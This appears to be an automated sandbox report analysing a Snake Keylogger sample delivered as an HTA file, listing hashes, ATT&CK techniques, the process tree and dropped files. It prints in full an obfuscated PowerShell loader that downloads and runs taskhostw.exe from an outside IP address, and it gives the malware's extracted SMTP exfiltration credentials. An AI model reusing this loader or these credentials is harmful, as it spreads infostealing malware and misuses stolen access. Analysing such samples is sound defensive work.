snakekeylogger | bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef

Analysis

max time kernel
148s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
07-10-2024 01:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef.hta
Size

150KB
MD5

25a0a6e379daa9cb5c68307fbf0857ea
SHA1

4c672a33a46b32584f00868c4b98d10187a91c3c
SHA256

bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef
SHA512

fb0bb7232df274cc07e30ec425e891e40cc105469e2aaf0f0d3843199c605f910a74690195a08ed1b269725ff13a48b927585d0f98a655743b0484ea8f652ee7
SSDEEP

48:7oa+ahWjz7eWLB2L64UKB3Rns4wKB3RnFWhWYYeecSr99DdokZGStBw04v4U1QYx:Ea+Cw7W3FNYfqffZUgAVT

Score

10^/10

snakekeylogger collection defense_evasion discovery execution keylogger stealer

Malware Config

Extracted

Family

snakekeylogger

Credentials

Protocol: smtp
Host:
mail.purityontap.com
Port:
587
Username:
[email protected]
Password:
mail55
Email To:
[email protected]

Signatures

Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger payload 1 IoCs

resource	yara_rule
behavioral2/memory/4832-84-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger

Blocklisted process makes network request 1 IoCs

flow	pid	Process
15	1176	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
1176	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 1 IoCs

pid	Process
772	taskhostw.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
21	checkip.dyndns.org

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0008000000023466-69.dat	autoit_exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 772 set thread context of 4832	772	taskhostw.exe	90

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1800	772	WerFault.exe	87

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhostw.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1176	powershell.exe
1176	powershell.exe
4832	RegSvcs.exe
4832	RegSvcs.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
772	taskhostw.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1176	powershell.exe
Token: SeDebugPrivilege	4832	RegSvcs.exe

Suspicious use of WriteProcessMemory 19 IoCs

description	pid	Process	procid_target
PID 1656 wrote to memory of 1928	1656	mshta.exe	81
PID 1656 wrote to memory of 1928	1656	mshta.exe	81
PID 1656 wrote to memory of 1928	1656	mshta.exe	81
PID 1928 wrote to memory of 1176	1928	cmd.exe	83
PID 1928 wrote to memory of 1176	1928	cmd.exe	83
PID 1928 wrote to memory of 1176	1928	cmd.exe	83
PID 1176 wrote to memory of 852	1176	powershell.exe	85
PID 1176 wrote to memory of 852	1176	powershell.exe	85
PID 1176 wrote to memory of 852	1176	powershell.exe	85
PID 852 wrote to memory of 5000	852	csc.exe	86
PID 852 wrote to memory of 5000	852	csc.exe	86
PID 852 wrote to memory of 5000	852	csc.exe	86
PID 1176 wrote to memory of 772	1176	powershell.exe	87
PID 1176 wrote to memory of 772	1176	powershell.exe	87
PID 1176 wrote to memory of 772	1176	powershell.exe	87
PID 772 wrote to memory of 4832	772	taskhostw.exe	90
PID 772 wrote to memory of 4832	772	taskhostw.exe	90
PID 772 wrote to memory of 4832	772	taskhostw.exe	90
PID 772 wrote to memory of 4832	772	taskhostw.exe	90

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1656
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c pOweRShELl -eX ByPass -nOp -W 1 -C dEviCECreDENTIalDEpLoyMeNt ; ieX($(Iex('[sySTeM.texT.eNcOdiNg]'+[cHar]58+[cHaR]58+'uTF8.gEtStrInG([sYstEm.COnvErt]'+[CHAR]58+[CHAR]0x3a+'FRoMBaSe64sTRINg('+[Char]34+'JGREYTI1RmEwZ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNQmVSZEVGSU5JdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaWXZIaWVyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFN0dWZyeFZEZ1IsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZNZGdweCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVa3JHUSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk1IckREdEtUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzd2FCbnIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGREYTI1RmEwZ0U6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy45LzI0MC90YXNraG9zdHcuZXhlIiwiJEVudjpBUFBEQVRBXHRhc2tob3N0dy5leGUiLDAsMCk7U3RhUlQtc0xFRVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXHRhc2tob3N0dy5leGUi'+[CHAR]0x22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1928
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOweRShELl -eX ByPass -nOp -W 1 -C dEviCECreDENTIalDEpLoyMeNt ; ieX($(Iex('[sySTeM.texT.eNcOdiNg]'+[cHar]58+[cHaR]58+'uTF8.gEtStrInG([sYstEm.COnvErt]'+[CHAR]58+[CHAR]0x3a+'FRoMBaSe64sTRINg('+[Char]34+'JGREYTI1RmEwZ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNQmVSZEVGSU5JdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaWXZIaWVyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFN0dWZyeFZEZ1IsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZNZGdweCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVa3JHUSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk1IckREdEtUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzd2FCbnIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGREYTI1RmEwZ0U6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy45LzI0MC90YXNraG9zdHcuZXhlIiwiJEVudjpBUFBEQVRBXHRhc2tob3N0dy5leGUiLDAsMCk7U3RhUlQtc0xFRVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXHRhc2tob3N0dy5leGUi'+[CHAR]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1176
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1gkyr20r\1gkyr20r.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:852
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA884.tmp" "c:\Users\Admin\AppData\Local\Temp\1gkyr20r\CSCDB684F855A4F477C88B424B1C2F77E8.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5000
  - - C:\Users\Admin\AppData\Roaming\taskhostw.exe
      "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      Suspicious use of WriteProcessMemory
      PID:772
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
        5⤵
        Accesses Microsoft Outlook profiles
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:4832
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 772 -s 736
        5⤵
        Program crash
        
        PID:1800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 772 -ip 772
1⤵
PID:1832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1gkyr20r\1gkyr20r.dll

Filesize
3KB

MD5
4e248c5ee25e56e406c889fcbe4c7663

SHA1
c521c5238e36370ae97ae5a80380905caff9fcb2

SHA256
b8a53c3ab75d82e52e4ab8c283740d8e153aee801028e1d8c07069784fc0296b

SHA512
a31faaa8ead049661b98d14d11798c8857b1cb2adb2978c33f8c613d5d966235f0546b63947c9c6f160fc650fb98e0aaa461ea75643428d6722975020ff1891a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA884.tmp

Filesize
1KB

MD5
6746cf9f56f2415d65588f3f9ec82cac

SHA1
bb9da7bba951a2ceef038b55be5e400e9886140d

SHA256
b7327fe33ca765289c94480042fa482125daaa5568f88e89d81f01acefad7331

SHA512
6d6a6a90c2d52f97f938143568264851f7561ba37bc1b411cff4aa85e9f2b2dfadfc75a0f33ff662abc539eb12fc772dc45525d0dc090847eb08a75a11255b1a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5s3prm1y.y5k.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\taskhostw.exe

Filesize
931KB

MD5
58ff14d476f2bbaab31b12587c09559e

SHA1
ea9c7ce65a67f2a2d4e1ca4a2c3ac6785021fc94

SHA256
1640e87780b219eba703c734e68b0f5cf793bc94fe0cdf9121658d12bb1f9364

SHA512
a75d4bd80620a9441783131812780397fb0c3b1c6d6b9147d65ece23d9cc9384c148f6c491794cfbc012c290e3266e06a76357b84141b843929a295c2649613a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1gkyr20r\1gkyr20r.0.cs

Filesize
477B

MD5
3c2b912e8118e7163d3d05a557f13d2f

SHA1
8889f87c11a2fca2b363c3064d317447a29c5498

SHA256
822f2e3e97f3d3f1d6a78969a3b8e502a2dd611a0bb9e1abccfd94f6faa22852

SHA512
7aeb33879a1c6a8a639e65e4dab9076d2c0c03bb65e2883c342d35b3ae3cbcda8dc6158da09ded5d908193af173cb4c34014b0055b13c1ed9be74fb3fe896499

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1gkyr20r\1gkyr20r.cmdline

Filesize
369B

MD5
baa58e00492804304ffb7c0e2a87c99c

SHA1
28388c79b5fbfe1b01ef6da78334fb7db3da0389

SHA256
eca51dc33c55e1dc3933613cda713405e79bc2e71c51e58329e91c75ccbcd400

SHA512
cd8e536d39e99d24c32a80807515976ec215e2d45b7b30f564ee9629fa0a2ded128b1199e7d1e7343a1cc439a3c36c9d33f21e481aef584e730d092cdc10e6f3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1gkyr20r\CSCDB684F855A4F477C88B424B1C2F77E8.TMP

Filesize
652B

MD5
566c59f1b96ed7468fb8b16d179268ae

SHA1
ab9c6167c9cf5137fb9880a65c422e7625451e3e

SHA256
301aba9a42690432824f52021a236fac2754dfa63edcdbdfd24dc589bbd5c279

SHA512
b4ad17552a6e7dfde2fb1bb86c47f7a6f2f617965a214d9c8cf5dd443d00646dfbf051bb3345d6002561dae5a60f01e89defdff69213351bbdc33bc6016e9f19

Download Submit
memory/1176-41-0x0000000007560000-0x0000000007571000-memory.dmp

Filesize
68KB

Download
memory/1176-45-0x00000000075D0000-0x00000000075D8000-memory.dmp

Filesize
32KB

Download
memory/1176-17-0x0000000005A10000-0x0000000005D64000-memory.dmp

Filesize
3.3MB

Download
memory/1176-18-0x0000000006010000-0x000000000602E000-memory.dmp

Filesize
120KB

Download
memory/1176-19-0x00000000063E0000-0x000000000642C000-memory.dmp

Filesize
304KB

Download
memory/1176-20-0x0000000006600000-0x0000000006632000-memory.dmp

Filesize
200KB

Download
memory/1176-21-0x000000006E030000-0x000000006E07C000-memory.dmp

Filesize
304KB

Download
memory/1176-22-0x0000000071770000-0x0000000071F20000-memory.dmp

Filesize
7.7MB

Download
memory/1176-23-0x000000006E3A0000-0x000000006E6F4000-memory.dmp

Filesize
3.3MB

Download
memory/1176-34-0x00000000072E0000-0x0000000007383000-memory.dmp

Filesize
652KB

Download
memory/1176-33-0x00000000071F0000-0x000000000720E000-memory.dmp

Filesize
120KB

Download
memory/1176-35-0x0000000071770000-0x0000000071F20000-memory.dmp

Filesize
7.7MB

Download
memory/1176-36-0x0000000071770000-0x0000000071F20000-memory.dmp

Filesize
7.7MB

Download
memory/1176-38-0x00000000072A0000-0x00000000072BA000-memory.dmp

Filesize
104KB

Download
memory/1176-37-0x0000000007A10000-0x000000000808A000-memory.dmp

Filesize
6.5MB

Download
memory/1176-39-0x00000000073E0000-0x00000000073EA000-memory.dmp

Filesize
40KB

Download
memory/1176-40-0x0000000007600000-0x0000000007696000-memory.dmp

Filesize
600KB

Download
memory/1176-0-0x000000007177E000-0x000000007177F000-memory.dmp

Filesize
4KB

Download
memory/1176-42-0x0000000007590000-0x000000000759E000-memory.dmp

Filesize
56KB

Download
memory/1176-43-0x00000000075A0000-0x00000000075B4000-memory.dmp

Filesize
80KB

Download
memory/1176-44-0x00000000075E0000-0x00000000075FA000-memory.dmp

Filesize
104KB

Download
memory/1176-7-0x00000000059A0000-0x0000000005A06000-memory.dmp

Filesize
408KB

Download
memory/1176-6-0x0000000005930000-0x0000000005996000-memory.dmp

Filesize
408KB

Download
memory/1176-5-0x0000000004F60000-0x0000000004F82000-memory.dmp

Filesize
136KB

Download
memory/1176-4-0x0000000071770000-0x0000000071F20000-memory.dmp

Filesize
7.7MB

Download
memory/1176-3-0x0000000071770000-0x0000000071F20000-memory.dmp

Filesize
7.7MB

Download
memory/1176-58-0x00000000075D0000-0x00000000075D8000-memory.dmp

Filesize
32KB

Download
memory/1176-2-0x0000000005190000-0x00000000057B8000-memory.dmp

Filesize
6.2MB

Download
memory/1176-64-0x000000007177E000-0x000000007177F000-memory.dmp

Filesize
4KB

Download
memory/1176-65-0x0000000071770000-0x0000000071F20000-memory.dmp

Filesize
7.7MB

Download
memory/1176-66-0x0000000071770000-0x0000000071F20000-memory.dmp

Filesize
7.7MB

Download
memory/1176-67-0x0000000007890000-0x00000000078B2000-memory.dmp

Filesize
136KB

Download
memory/1176-68-0x0000000008640000-0x0000000008BE4000-memory.dmp

Filesize
5.6MB

Download
memory/1176-1-0x0000000002A30000-0x0000000002A66000-memory.dmp

Filesize
216KB

Download
memory/1176-81-0x0000000071770000-0x0000000071F20000-memory.dmp

Filesize
7.7MB

Download
memory/4832-84-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/4832-85-0x00000000057C0000-0x000000000585C000-memory.dmp

Filesize
624KB

Download
memory/4832-86-0x0000000006950000-0x00000000069A0000-memory.dmp

Filesize
320KB

Download
memory/4832-87-0x0000000006B70000-0x0000000006D32000-memory.dmp

Filesize
1.8MB

Download
memory/4832-88-0x0000000006A40000-0x0000000006AD2000-memory.dmp

Filesize
584KB

Download
memory/4832-89-0x00000000069E0000-0x00000000069EA000-memory.dmp

Filesize
40KB

Download